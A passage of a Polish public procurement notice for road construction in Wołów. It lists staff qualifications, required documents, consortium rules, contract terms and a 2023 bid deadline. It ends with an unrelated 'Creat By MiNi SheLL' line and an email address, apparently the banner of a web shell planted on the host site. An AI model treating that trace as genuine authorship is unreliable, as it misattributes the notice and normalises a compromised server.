budowlanymi wydanymi na podstawie wcześniej obowiązujących przepisów, <br/>	pełniła funkcję kierownika budowy przy co najmniej dwóch zadaniach inwestycyjnych lub remontowych – budowy, przebudowy lub remontu dróg/ulic o jezdni z nawierzchnią z kostki betonowej, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 500.000,00 zł brutto każda.<br/><br/>•	Funkcja: Projektant – co najmniej 1 osoba, która:<br/>	posiada uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane do projektowania, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>	pełniła funkcję projektanta przy co najmniej jednym zadaniu inwestycyjnym lub remontowym – budowy, przebudowy lub remontu dróg/ulic o jezdni z nawierzchnią z kostki betonowej, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 50.000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz robót budowlanych odpowiadających opisowi warunku określonemu w Rozdziale VI ust. 2 pkt 4 litera a wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie,wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. Wzór wykazu stanowi załącznik nr 6 do SWZ.<br/>2)	wykaz osób, odpowiadających opisowi warunku określonemu w Rozdziale VI ust. 2 pkt 4 litera c skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu stanowi załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Formularz ofertowy– wypełniony i podpisany przez wykonawcę.<br/>2)	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu - wypełnione i podpisane przez wykonawcę. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>3)	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z własnym oświadczeniem, o którym mowa w pkt.2, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>4)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt.2 składa każdy z wykonawców w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>5)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców w przypadku o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp, Wykonawcy składają oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni wykonawcy.<br/>6)	ZOBOWIĄZANIE do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówieniajeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>7)	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik/ doreprezentowaniawpostępowaniuWykonawcówwspólnieubiegającychsięoudzieleniezamówienia – dotyczyofertskładanychprzezWykonawcówwspólnieubiegającychsięoudzieleniezamówienia.<br/>8)	Uzasadnienie zastrzeżenia dokumentów wskazanych w formularzu ofertowym jako tajemnicy przedsiębiorstwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/ spółki cywilne):<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2)	Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo / upoważnienie do pełnienia takiej funkcji wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego z wykonawców występujących wspólnie należy załączyć do oferty.<br/>3)	Oferta winna być podpisana przez każdego z wykonawców występujących wspólnie lub przez upoważnionego przedstawiciela.<br/>4)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>5)	Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich wykonawców, przy czym termin, na jaki została zawarta nie może być krótszy niż termin realizacji zamówienia.<br/><br/>W przypadku składania oferty przez dwa lub więcej podmiotów (wykonawcy wspólnie ubiegający się o udzielenie zamówienia) oraz w sytuacji, gdy wykonawca będzie polegał na zasobach podmiotu trzeciego, na zasadach określonych w art. 118 ustawy Pzp, w celu potwierdzenia spełnienia warunku udziału w postępowaniu w zakresie posiadanej przez Wykonawcę wiedzy i doświadczenia co najmniej jeden podmiot musi wykazać się realizacją wymaganych dwóch robót lub usług. Niniejszy warunek nie podlega sumowaniu (Warunek nie będzie spełniony, jeżeli wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich indywidualnie nie wykazał się całym wymaganym doświadczeniem opisanym powyżej).<br/>Oferent załączy wykaz wykonanych usług, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie. <br/>Wykonawca musi być w stanie wykazać i udowodnić zrealizowanie wskazanych w warunku robót oraz zadań projektowych na wezwanie Zamawiającego.<br/>Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> informacje na temat zasad udzielania zaliczek zawiera załącznik nr 8 - wzór umowy <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian umowy został szczegółowo opisany we wzorze umowy stanowiącym załącznik nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/wolow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-25 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający dodaje nową obligatoryjną przesłankę wykluczenia z postępowania, tj.: Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę, w stosunku do którego zachodzi którakolwiek z okoliczności wskazanych w art.7 ust.1 ustawy z dnia 13 kwietnia 2022r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com